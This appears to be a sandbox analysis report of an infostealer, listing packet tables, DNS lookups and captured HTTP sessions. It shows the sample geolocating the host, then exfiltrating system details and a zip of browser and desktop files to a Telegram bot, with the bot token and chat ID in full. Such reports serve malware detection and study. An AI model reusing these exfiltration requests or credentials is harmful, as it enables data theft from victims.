Jan 10, 2025 19:09:06.755353928 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:07.207273006 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:07.207381964 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:07.207448959 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:07.208311081 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:07.210078955 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:07.210125923 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:07.210284948 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:07.210666895 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:07.210680962 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:07.851155996 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:07.853708982 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:07.853729963 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.157551050 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.157947063 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.157983065 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.158332109 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.158332109 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.158401012 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.158477068 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.158628941 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.158669949 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.158813000 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.158857107 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159030914 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159060955 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159089088 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159102917 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159220934 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159249067 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159301996 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159322023 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159354925 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159373999 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159408092 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159426928 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.159516096 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.159527063 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.657284021 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.657470942 CET	443	49819	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:08.657638073 CET	49819	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:08.658248901 CET	49819	443	192.168.2.7	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:09:00.209904909 CET	53253	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:09:00.217803955 CET	53	53253	1.1.1.1	192.168.2.7
Jan 10, 2025 19:09:00.285193920 CET	54559	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:09:00.293771982 CET	53	54559	1.1.1.1	192.168.2.7
Jan 10, 2025 19:09:00.849463940 CET	64321	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:09:00.856442928 CET	53	64321	1.1.1.1	192.168.2.7
Jan 10, 2025 19:09:02.487819910 CET	63492	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:09:02.495130062 CET	53	63492	1.1.1.1	192.168.2.7
Jan 10, 2025 19:09:06.180762053 CET	62720	53	192.168.2.7	1.1.1.1
Jan 10, 2025 19:09:06.187541962 CET	53	62720	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 19:09:00.209904909 CET	192.168.2.7	1.1.1.1	0x23b4	Standard query (0)	100.41.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 10, 2025 19:09:00.285193920 CET	192.168.2.7	1.1.1.1	0x7246	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:00.849463940 CET	192.168.2.7	1.1.1.1	0x1b7d	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:02.487819910 CET	192.168.2.7	1.1.1.1	0xc018	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:06.180762053 CET	192.168.2.7	1.1.1.1	0xbb65	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 19:09:00.217803955 CET	1.1.1.1	192.168.2.7	0x23b4	Name error (3)	100.41.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 10, 2025 19:09:00.293771982 CET	1.1.1.1	192.168.2.7	0x7246	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:00.293771982 CET	1.1.1.1	192.168.2.7	0x7246	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:00.856442928 CET	1.1.1.1	192.168.2.7	0x1b7d	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:00.856442928 CET	1.1.1.1	192.168.2.7	0x1b7d	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:02.495130062 CET	1.1.1.1	192.168.2.7	0xc018	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:06.187541962 CET	1.1.1.1	192.168.2.7	0xbb65	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:06.187541962 CET	1.1.1.1	192.168.2.7	0xbb65	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:09:06.187541962 CET	1.1.1.1	192.168.2.7	0xbb65	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.mylnikov.org

api.telegram.org

pastebin.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49768	104.16.185.241	80	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:09:00.307154894 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jan 10, 2025 19:09:00.778568029 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 18:09:00 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=lBkkVxzACafoQ.mOKvrLE4St9ckzJB6hbBWaUCtWOcs-1736532540-1.0.1.1-l5pKUvQBb7kXKdo.SXgRg00g5WOgg1EHxXmiwvhm.QO_qNUfeunnK85XJeUxP9LoI2FvzU8zUeJUrCIFCT9igw; path=/; expires=Fri, 10-Jan-25 18:39:00 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ffe9d9b88bc43f1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: 8.46.123.189

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49775	172.67.196.114	443	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 18:09:01 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2025-01-10 18:09:02 UTC	998	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 18:09:02 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Fri, 10 Jan 2025 18:09:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQpGjpRl6nRT5KzzUE25iHXzLVfT2mHziXVrfAEcytz%2FW48BMhxjRkX%2FrzL05GEYqn69JL3ja4%2FfDrmlq7iEecR%2Bl58idR1TAWCJ%2B3PZtgRlrzw0oePXhNTnTJAsZ6S8Esi%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ffe9d9fdf824344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1562&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=726&delivery_rate=1823860&cwnd=47&unsent_bytes=0&cid=d0df666836e5ba43&ts=1167&x=0"
2025-01-10 18:09:02 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 36 35 33 32 35 34 32 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1736532542}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49788	149.154.167.220	443	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 18:09:03 UTC	1679	OUT	GET /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%201:08:51%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20928100%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KSDR3NP%0ARAM:%204095MB%0AHWID:%205C79F150C2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20( [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2025-01-10 18:09:03 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 18:09:03 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 18:09:03 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 30 30 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 900"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49794	149.154.167.220	443	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 18:09:03 UTC	171	OUT	GET /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2025-01-10 18:09:04 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 18:09:04 GMT Content-Type: application/json Content-Length: 286 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 18:09:04 UTC	286	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 33 35 30 30 39 37 33 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6a 61 67 61 62 61 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 61 6e 64 69 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 37 39 31 30 33 39 30 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 76 69 64 20 42 68 61 74 74 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 76 65 65 42 68 61 74 74 69 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 32 35 34 34 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 Data Ascii: {"ok":true,"result":{"message_id":1660,"from":{"id":7935009733,"is_bot":true,"first_name":"jagaban","username":"ghandisbot"},"chat":{"id":6779103906,"first_name":"David Bhatti","username":"DaveeBhatti","type":"private"},"date":1736532544,"text":"\ud83d\ud

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49802	149.154.167.220	443	7216	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 18:09:05 UTC	254	OUT	POST /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendDocument?chat_id=6779103906 HTTP/1.1 Content-Type: multipart/form-data; boundary="ef32c740-a05f-4c9a-991e-25cea7544c67" Host: api.telegram.org Content-Length: 188961 Expect: 100-continue
2025-01-10 18:09:05 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 18:09:05 UTC	40	OUT	Data Raw: 2d 2d 65 66 33 32 63 37 34 30 2d 61 30 35 66 2d 34 63 39 61 2d 39 39 31 65 2d 32 35 63 65 61 37 35 34 34 63 36 37 0d 0a Data Ascii: --ef32c740-a05f-4c9a-991e-25cea7544c67
2025-01-10 18:09:05 UTC	281	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 66 72 6f 6e 74 64 65 73 6b 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 35 30 32 35 38 66 62 64 30 33 39 62 37 37 36 33 62 37 38 65 33 63 62 66 36 62 34 64 34 65 65 33 5c 66 72 6f 6e 74 64 65 73 6b 40 39 32 38 31 30 30 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 66 72 6f 6e 74 64 65 73 6b 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 35 30 32 35 38 66 62 64 30 33 39 62 37 37 36 33 62 37 38 65 33 63 62 66 36 62 34 64 34 65 65 33 25 35 43 66 72 6f 6e 74 64 Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C50258fbd039b7763b78e3cbf6b4d4ee3%5Cuser
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 44 92 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 44 92 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 1a 69 2a 5a 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 1a 69 2a 5a bc dc 30 73 82 01 00 00 35 04 00 00 17 00 00 00 44 Data Ascii: PKDZBrowsers\Edge\PKDZBrowsers\Google\PKiZQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKiZ0s5D
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 3a 3d 6f e9 58 fe e6 6b 03 dd 90 47 a0 95 8d 8b dc 1e c6 e1 81 43 1f 96 13 4f 30 f2 9a 35 d6 c8 48 89 be 47 67 ec a1 94 90 72 d3 6b 36 6c 56 de 06 57 74 58 9a 0f 34 5e f0 7c 48 43 41 57 82 db 7d b1 56 1e ea 11 fa fd f9 03 50 4b 03 04 14 00 00 00 08 00 d5 1e 45 57 64 c1 35 a7 83 02 00 00 02 04 00 00 36 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 66 72 6f 6e 74 64 65 73 6b 5c 44 65 73 6b 74 6f 70 5c 53 4e 49 50 47 50 50 52 45 50 2e 70 6e 67 0d 93 47 8e 45 21 0c 04 f7 23 fd 43 11 4d b2 49 06 03 f7 3f c8 3c ef 5b 2e 95 ba 27 c5 06 ad 0d d7 b6 9d 27 a3 36 fd b8 3e 64 de 7a b3 85 d0 ce a4 cd b7 c8 6e b8 e2 69 f9 d8 e1 03 46 8a 5d fb c7 8d 37 f2 7c 4a e2 f1 25 98 9c 48 49 36 fd a2 0e 2b 7b 5b 63 d2 e7 94 45 9b 30 3b 5b 99 5b b3 25 Data Ascii: :=oXkGCO05HGgrk6lVWtX4^\|HCAW}VPKEWd56Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP.pngGE!#CMI?<[.''6>dzniF]7\|J%HI6+{[cE0;[[%
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 55 4e 4b 52 4c 43 56 4f 48 56 5c 55 4e 4b 52 4c 43 56 4f 48 56 2e 64 6f 63 78 15 93 49 8e 40 21 08 44 f7 9d f4 a1 9c 11 15 47 54 bc ff 41 fa 37 2b 02 81 50 79 05 53 1a d9 ec 0a 5b dd 06 15 d4 13 1b 8b 5e 22 2d 8b 96 cd ae e7 10 10 8d 37 71 19 57 42 2d a5 2d 73 73 c8 c2 0f de 29 8b 89 ab 67 16 c5 b6 cc a0 0f 26 55 a2 67 25 cb c6 b4 a5 b7 20 7d c6 b7 14 9d c9 f4 2c e8 41 95 66 e5 b3 19 9f d7 ad be 58 5e e5 b6 95 60 9a c8 99 41 86 30 d7 2c c7 1d 6f 44 3d 28 98 e0 f2 cb 0b dc f5 96 c6 8d dc eb 83 10 8a f5 30 af fa da 4d 8f 86 98 f6 be 5f 31 16 57 8a bf ae ea 8e b3 c8 9c a5 ed b9 99 30 e3 97 3b 0f 90 bd db ed 3c 6b 5d 4c 3d 54 6c 15 cf 3a 85 5a 74 fd 9e 5b 75 a6 6c 07 0d 0e 96 af f9 64 0e af 4e 99 53 94 a3 30 ce d0 11 ab 20 71 b1 72 c9 ba 35 7a 11 55 02 ca 4b Data Ascii: UNKRLCVOHV\UNKRLCVOHV.docxI@!DGTA7+PyS[^"-7qWB--ss)g&Ug% },AfX^`A0,oD=(0M_1W0;<k]L=Tl:Zt[uldNS0 qr5zUK
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 6f 63 78 0d 93 49 8e 45 21 0c 03 f7 2d fd 43 3d e6 84 29 8c 81 dc ff 20 cd 12 89 d8 a6 62 7c 9a d7 64 b3 c6 74 5f 37 7b 9a 59 c7 3a 3c 85 d4 e4 3b cc e2 ce a5 e5 7a 05 2a e5 aa d7 9e 80 35 e0 4d 21 2a 6d 0d 37 05 37 35 4a ee 14 d9 a7 8a 02 65 0a 40 d0 45 42 07 51 fa 2b f0 3d 35 e7 b0 1c af 39 41 82 10 f4 c5 20 c3 81 ac 65 82 4b cd b2 52 35 33 56 d1 71 7c f5 db f1 63 43 89 d2 a6 10 f2 1c 39 3a 1d 6e ca 82 37 4e 94 e5 49 8f b1 11 6b 54 3c e6 48 01 07 88 14 08 75 db 43 b9 8d f8 a9 e0 87 0f 6e f1 2e 93 a7 bf 3a 9d da 2c 7d 60 6f cf 89 b1 bc 80 96 e2 f9 82 8b b8 5a 30 41 85 fc ce cf e8 b4 9b 41 af 08 3b 94 4c 80 ab 93 53 46 ad c6 c1 cd b5 23 71 c6 b0 ab 2d 3e dc 5b 28 e3 4b 3a db b3 54 6f 60 3e 14 1f 2e 18 b4 f4 cb d2 1c 9f d2 a2 4f 83 3a a1 fd 00 9b 94 5b 2a Data Ascii: ocxIE!-C=) b\|dt_7{Y:<;z5M!m775Je@EBQ+=59A eKR53Vq\|cC9:n7NIkT<HuCn.:,}`oZ0AA;LSF#q->[(K:To`>.O:[*
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 9c 5c 40 cb c9 eb 1b c3 43 c1 af 72 3c 04 45 2f 57 a1 59 cf 48 63 d9 ec f0 f4 69 9c 56 9f a6 d2 f2 9c 4e f2 91 ea 66 a6 50 f3 3c 73 65 57 c0 b8 cb 64 d7 a1 ee 3e 73 f2 00 ff 42 9b 96 86 42 41 99 26 8d a0 25 d2 1b 37 65 d2 fa b5 be 70 9f 54 6b 6a d6 6f 80 34 00 6b dd 14 44 2a 3c 3e 35 40 aa 03 7d 76 39 aa 55 72 f7 a1 99 61 61 cb da 51 32 bc e0 ff 37 77 3d fa 17 10 57 5e a7 2c e2 11 c6 26 b9 4a cf 0c ae 27 0e 86 d3 75 38 83 92 e1 4a 9f ad d0 f1 24 bb 86 44 8f 5f 81 0c ed 93 af a3 6a 4b 5d d5 76 6e 2d 0d 5c c7 76 7d ca 65 88 70 5f 3d 47 4f e1 6c fa 9e df dd 6e d9 f7 76 a4 68 5a 90 b2 7b 95 23 ed 09 4a 35 e3 fb c6 c0 b5 98 6e a1 52 88 7c 83 8c 6e cc 51 17 4a 3f 5f 01 ed 52 bc 74 2e a3 04 1f 38 b0 eb cd 02 ef d7 51 2e 2d a5 cb 33 9f 71 c7 4f 5e 8c 49 19 69 7b Data Ascii: \@Cr<E/WYHciVNfP<seWd>sBBA&%7epTkjo4kD*<>5@}v9UraaQ27w=W^,&J'u8J$D_jK]vn-\v}ep_=GOlnvhZ{#J5nR\|nQJ?_Rt.8Q.-3qO^Ii{
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 7f 74 9f 11 ec cd 1d 11 e4 0f f8 e4 c8 9f 74 2f 0c 1c 55 99 34 9f 10 42 55 f4 f7 97 7c 69 60 db ce 07 b5 9d 13 66 6c f8 da db 76 0e 41 3f ea 08 35 34 bb 1e d5 4d 44 1f bc d1 31 68 3f 0d bb 3d 24 cc ca bc 2c 74 8f 50 84 82 01 0a 02 3c 60 83 e0 7e cd e9 fd bd 58 c9 f9 f3 03 99 88 87 87 95 8c bb 9f 69 40 30 d4 fa 8e 9b 5d 2d 93 36 ad e6 3a 0e d1 5b 3a 21 fa de a4 03 0f e3 64 3e ab 8a a7 7c 72 3b 56 f3 2f 5d 75 34 b2 e7 3f cf eb 45 24 5e 34 56 50 0a 61 48 0b b2 cc d0 6d 0c cf 5f a5 f9 a2 98 b5 05 74 66 6c 31 db 0e ee 0b 71 d4 11 43 05 85 b8 d0 9f e2 22 61 fe 24 70 94 3a 2a 2e 6a 9d 44 ec 30 85 27 66 85 ed 37 18 1a 58 d2 91 50 58 a2 c2 98 fa 59 85 25 57 4c f3 68 56 65 da a1 fa 1a 8a 88 6d 43 91 06 29 ac 7b 40 6f e4 2c 55 75 f5 bc a5 a1 f5 97 6e e0 7b 1d 47 be Data Ascii: tt/U4BU\|i`flvA?54MD1h?=$,tP<`~Xi@0]-6:[:!d>\|r;V/]u4?E$^4VPaHm_tfl1qC"a$p:*.jD0'f7XPXY%WLhVemC){@o,Uun{G
2025-01-10 18:09:05 UTC	16355	OUT	Data Raw: 66 20 d5 3e 8b a1 79 cd 38 e1 82 2d 0e d4 2c bf b9 8f f8 47 25 a1 45 a7 ed 3e 3e ed c6 5b f6 7c 76 42 1e e6 df d1 3a 25 30 03 0b dd 8c 36 63 43 e1 ce 62 e3 8a e1 23 f7 36 d3 88 e2 c2 be 92 d5 71 86 2e 94 eb d3 fc ce b5 d1 3c e1 9b c1 2f 7e d9 c5 b6 d5 0f b2 ae 30 fe 3c 1a bf 97 41 d7 3b b2 dd 95 4d 72 62 94 3b 65 d1 c7 d3 99 30 f0 a7 8b fa bd c9 cb 13 a2 7b 51 9f 47 7b ed a7 e8 f8 5f f6 07 e8 c2 c2 4d 26 2f 8d 68 e5 62 bb 86 35 5e ba d8 e4 f5 87 e9 5c 0f aa 73 f0 99 34 c4 c5 18 9c 12 2f 8d 82 12 ca da fc 24 b6 b7 b1 8d ba 7b bb b2 b2 3b d2 45 18 46 a6 9b 43 1e 75 f6 35 82 e8 33 14 11 c7 4c f2 4c a3 8c 0b 8d fa 6e f2 34 f3 0f de 1d d7 4b 00 cc ab 5a 50 01 75 87 76 78 0d a1 4c ce fa 6b b7 38 14 93 87 7e 98 8a a4 13 df c0 39 0f 40 3b 7c 67 af af 2b d2 d7 21 Data Ascii: f >y8-,G%E>>[\|vB:%06cCb#6q.</~0<A;Mrb;e0{QG{_M&/hb5^\s4/${;EFCu53LLn4KZPuvxLk8~9@;\|g+!
